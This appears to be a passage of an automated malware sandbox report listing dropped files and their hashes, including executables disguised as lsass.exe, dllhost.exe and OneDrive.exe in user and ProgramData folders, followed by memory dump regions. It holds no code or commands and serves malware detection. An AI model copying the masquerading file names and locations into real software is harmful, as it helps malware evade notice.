SHA512
3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
401674612435a6f7e662f3650aa496ff

SHA1
844e3d3afeed1e0d03baf6b3967ed90bac4c0409

SHA256
49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd

SHA512
3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T04CQVNDBO2W2SE07WN4.temp

Filesize
7KB

MD5
401674612435a6f7e662f3650aa496ff

SHA1
844e3d3afeed1e0d03baf6b3967ed90bac4c0409

SHA256
49d04f3197eed5b91b740cbe795a6e11eb802ba6d6202791973f3606190fe5dd

SHA512
3d159657f6419912fe5791ba6bb42d1d863b9e2666932ccd195a2d381e280c9ab8088cafa7dc543d3cabea4674a9bec27ae1a891c3a1ecc192714b26e0a4c46d

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\dllhost.exe

Filesize
1.6MB

MD5
08e3930a42197a422d064569c4778997

SHA1
74832aa332b48422e5d448f5099b397e84c18712

SHA256
322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813

SHA512
b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

Download Submit
C:\Users\Admin\AppData\Roaming\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\programdata\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\??\c:\users\admin\appdata\roaming\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\ProgramData\lsass\lsass.exe

Filesize
1.7MB

MD5
eb85c562249e96d7a946111241f0ea4b

SHA1
5c89db5dad53c26ec1f8189261a7fc4eace18773

SHA256
95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8

SHA512
ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Download Submit
\Users\Admin\AppData\Roaming\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

Filesize
9.8MB

MD5
743022328f955e2cbb5f2f375bd0ab72

SHA1
226a731c638cf6e79b92cc2bb6369b04e6a98b55

SHA256
dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f

SHA512
aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

Download Submit
memory/268-91-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/268-81-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/268-93-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/268-74-0x000000001B170000-0x000000001B452000-memory.dmp

Filesize
2.9MB

Download
memory/268-83-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/268-88-0x0000000002910000-0x0000000002990000-memory.dmp

Filesize
512KB

Download
memory/888-80-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/888-78-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/888-87-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/888-75-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download
memory/888-92-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/888-82-0x00000000028D0000-0x0000000002950000-memory.dmp

Filesize
512KB

Download
memory/1172-77-0x0000000001FB4000-0x0000000001FB7000-memory.dmp

Filesize
12KB

Download
memory/1172-76-0x0000000001FB0000-0x0000000002030000-memory.dmp

Filesize
512KB

Download
memory/1172-79-0x0000000001FBB000-0x0000000001FF2000-memory.dmp

Filesize
220KB

Download
memory/1220-160-0x0000000006F30000-0x0000000007350000-memory.dmp

Filesize
4.1MB

Download
memory/1220-137-0x00000000010A0000-0x00000000014C0000-memory.dmp

Filesize
4.1MB

Download
memory/1220-158-0x00000000010A0000-0x00000000014C0000-memory.dmp

Filesize
4.1MB

Download
memory/1220-175-0x0000000006F30000-0x0000000007350000-memory.dmp

Filesize
4.1MB

Download
memory/1220-139-0x0000000005C50000-0x0000000005C90000-memory.dmp

Filesize
256KB

Download
memory/1220-138-0x00000000010A0000-0x00000000014C0000-memory.dmp

Filesize
4.1MB

Download
memory/1496-196-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-192-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-204-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-120-0x0000000004380000-0x0000000004381000-memory.dmp

Filesize
4KB

Download
memory/1496-121-0x0000000004360000-0x0000000004361000-memory.dmp

Filesize
4KB

Download
memory/1496-124-0x0000000004370000-0x0000000004371000-memory.dmp

Filesize
4KB

Download
memory/1496-171-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-116-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-200-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-170-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-157-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-128-0x00000000008A0000-0x00000000008A1000-memory.dmp

Filesize
4KB

Download
memory/1496-122-0x0000000004390000-0x0000000004391000-memory.dmp

Filesize
4KB

Download
memory/1496-208-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-188-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-179-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1496-184-0x0000000000400000-0x000000000083B000-memory.dmp

Filesize
4.2MB

Download
memory/1600-169-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1600-177-0x0000000140000000-0x0000000140029000-memory.dmp

Filesize
164KB

Download
memory/1676-165-0x000000013F040000-0x000000013FA0A000-memory.dmp

Filesize
9.8MB

Download
memory/1676-167-0x000000013F040000-0x000000013FA0A000-memory.dmp

Filesize
9.8MB

Download
memory/1684-89-0x0000000002690000-0x000000000269E000-memory.dmp

Filesize
56KB

Download
memory/1684-90-0x000000001B670000-0x000000001B680000-memory.dmp

Filesize
64KB

Download
memory/1684-86-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/1684-85-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/1684-84-0x0000000002720000-0x00000000027A0000-memory.dmp

Filesize
512KB

Download
memory/1704-54-0x0000000001060000-0x000000000107C000-memory.dmp

Filesize
112KB

Download
memory/1868-172-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-201-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-176-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-209-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-178-0x0000000005C60000-0x0000000005CA0000-memory.dmp

Filesize
256KB

Download
memory/1868-205-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-180-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-197-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-159-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-163-0x0000000005C60000-0x0000000005CA0000-memory.dmp

Filesize
256KB

Download
memory/1868-185-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-193-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-162-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-189-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1868-161-0x0000000000AA0000-0x0000000000EC0000-memory.dmp

Filesize
4.1MB

Download
memory/1872-109-0x000000013F3D0000-0x000000013FD9A000-memory.dmp

Filesize
9.8MB

Download
memory/1996-136-0x00000000022EB000-0x0000000002322000-memory.dmp

Filesize
220KB

Download
memory/1996-135-0x00000000022E4000-0x00000000022E7000-memory.dmp

Filesize
12KB

Download
memory/2000-202-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-181-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-198-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-186-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-174-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-194-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-190-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-168-0x0000000000100000-0x0000000000120000-memory.dmp

Filesize
128KB

Download
memory/2000-206-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download
memory/2000-183-0x0000000002040000-0x0000000002060000-memory.dmp

Filesize
128KB

Download
memory/2000-173-0x0000000002040000-0x0000000002060000-memory.dmp

Filesize
128KB

Download
memory/2000-210-0x0000000140000000-0x00000001407EF000-memory.dmp

Filesize
7.9MB

Download